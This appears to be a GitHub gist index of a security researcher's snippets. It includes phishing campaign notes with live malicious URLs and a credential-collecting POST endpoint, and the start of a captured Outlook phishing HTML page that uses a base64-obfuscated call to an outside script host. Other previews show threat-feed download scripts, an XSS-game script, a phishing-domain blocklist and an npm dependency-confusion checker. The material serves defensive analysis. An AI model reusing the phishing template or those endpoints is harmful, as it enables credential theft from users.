The following portal is using microsoft forms to send out the emails to potential victims. Form URL: https://ncv.microsoft.com/xfzlQmbcLr Portal URL: https://27-02-0-f39h5r8g-wrfgw0e8c3-t0rf7-0wrg-g7.obs.ap-southeast-2.myhuaweicloud.com/vt65g-09we-0t9hng-0w9rmvfj-e09thg-9rjfg9-er.html?AWSAccessKeyId=FQWNSQAJNPZJXV8B91KK&Expires=1677494075&Signature=cBYwgWA9mU%2BlQTS/FMhe6QYGcoE%3D POST location: https://techsmashwru.ru/.cas/next.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| folder_prefix="./feeds/" # $(date +%Y/%m/%d) | |
| mkdir -p ${folder_prefix} | |
| rm -f ${folder_prefix}/*.txt | |
| curl -L -s https://phishing.army/download/phishing_army_blocklist_extended.txt -o ${folder_prefix}/phishing_army_domains.txt | |
| curl -L -s https://hole.cert.pl/domains/domains.csv | cut -f 2 > ${folder_prefix}/cert_pl_domains.txt | |
| curl -L -s https://urlabuse.com/public/data/phishing_url.txt -o ${folder_prefix}/urlabuse_urls.txt | |
| curl -L -s https://threatview.io/Downloads/DOMAIN-High-Confidence-Feed.txt -o ${folder_prefix}/threatview_domains.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| scrapy () { | |
| get \ | |
| --mirror \ | |
| --no-clobber \ | |
| --page-requisites \ | |
| --adjust-extension \ | |
| --convert-links \ | |
| --restrict-file-names=windows \ | |
| --domains=$1 \ | |
| --no-parent \ |
miglen
/ phishing.html
Created
November 23, 2022 15:30
Outlook phishing portal attempt via html (educational only, I have received this via email)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta charset="UTF-8"> | |
| <script> | |
| let EMAIL_ADDRESS = "user@company.com"; // Change this to the email address | |
| let BASED64_ENCODED_EMAIL = ""; // If you wish to encode the email address, enter the based64 encoded email and leave the email address blank otherwise, leave this field blank | |
| let SCRIPT_LINK_URL = window.atob("aHR0cHM6Ly9tZWdhdGVycmEuaHUvc2NyaXB0LnBocA"); //Enter the script link here |
This is the contents from a phishing attemt I had recieved recently.
- Recieve an attachment.html usually from a free email service.
- The email contains html file with encoded JS that would call http://angelotti.it/cms/moj1.js
- Once you open the html file an outlook login portal will be visualized to authenticate.
IoCs:
miglen
/ Facebook Messenger Phishing Campaign via zu7.eu .md
Last active
May 31, 2022 17:02
Facebook Messenger Phishing Campaign via zu7.eu
Today I had recieved an interesting phishing message via Messenger from a frend, who's also a tech guy so it was suprirpising that he got compromised.
The initial message said:
Is it you in this video? 😱
https://zu7.eu/L3VAD6EzsR
The url loaded from any browser, orther than mobile will redirect to twitch.tv otherwise it would display the following html:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import urllib.parse | |
| from bs4 import BeautifulSoup | |
| from selenium import webdriver | |
| from selenium.common.exceptions import NoAlertPresentException | |
| url = "https://xss-game.appspot.com/level1/frame" | |
| response = requests.get(url) | |
| soup = BeautifulSoup(response.text) |
miglen
/ Esox-Lucius_PiHoleblocklists.txt
Created
September 30, 2021 10:13
Esox-Lucius_PiHoleblocklists.txt
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Source https://github.com/Esox-Lucius/PiHoleblocklists | |
| 0-800-email.com | |
| 0-aprcredit-card.website | |
| 0-aprcredit-cards.website | |
| 0-aprcreditcard.website | |
| 0-aprcreditcards.website | |
| 0-secure-paypal.com | |
| 0.0.0.0 0-0.028.openvpn.cloud.btcchina.com | |
| 0.0.0.0 0-100-195.btcc.com | |
| 0.0.0.0 0-100-bhd.foxypool.cf |
miglen
/ packagejson.py
Created
February 10, 2021 11:55
Dirty check for non existing public npm dependencies
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/env python3 | |
| # https://www.bleepingcomputer.com/news/security/researcher-hacks-over-35-tech-firms-in-novel-supply-chain-attack/ | |
| # The following script finds all package.json files in the current dir and checks if there are referenced any | |
| # dependencies that no public package is available for, making your application vulnerable to supply-chain attack. | |
| # Simply run ./packagejson.py in your root repository direcotory. | |
| import json | |
| import requests | |
| from pathlib import Path | |
| import urllib.parse |
NewerOlder